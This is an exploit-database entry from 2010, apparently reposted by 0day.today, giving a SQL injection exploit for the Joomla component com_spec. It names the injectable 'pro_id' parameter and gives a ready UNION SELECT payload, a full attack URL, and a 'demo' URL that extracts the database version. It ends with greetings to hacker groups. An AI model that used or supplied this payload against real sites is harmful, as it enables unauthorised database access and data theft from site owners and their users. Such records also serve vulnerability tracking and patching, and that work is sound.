Joomla Component com_spec SQL Injection Vulnerability

2010-03-30T00:00:00
ID 1337DAY-ID-11510
Type zdt
Reporter DevilZ TM
Modified 2010-03-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
Joomla Component com_spec SQL Injection Vulnerability
=====================================================

[~]######################################### InformatioN #############################################[~]
  
[~] Title     : Joomla Component com_spec SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : [email protected]
[~] Contact   : [email protected]
  
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_spec&view=spec&tmpl=component&pro_id=[SQL]
  
[~] ExploiT         :
  
-1+UNION+SELECT+1,2--
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_spec&view=spec&tmpl=component&pro_id=-1+UNION+SELECT+1,2--
 
[~] Demo            :
 
http://www.site.com/index.php?option=com_spec&view=spec&tmpl=component&[email protected]@version,2--
 
   
[~]######################################### ThankS To ... ############################################[~]
  
[~] Special Thanks To My Best FriendS :
  
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
  
[~] IRANIAN Young HackerZ
  
[~] GreetZ : Exploit-DB TeaM
 
[~]#########################################   FinisH :D   #############################################[~]



#  0day.today [2018-03-01]  #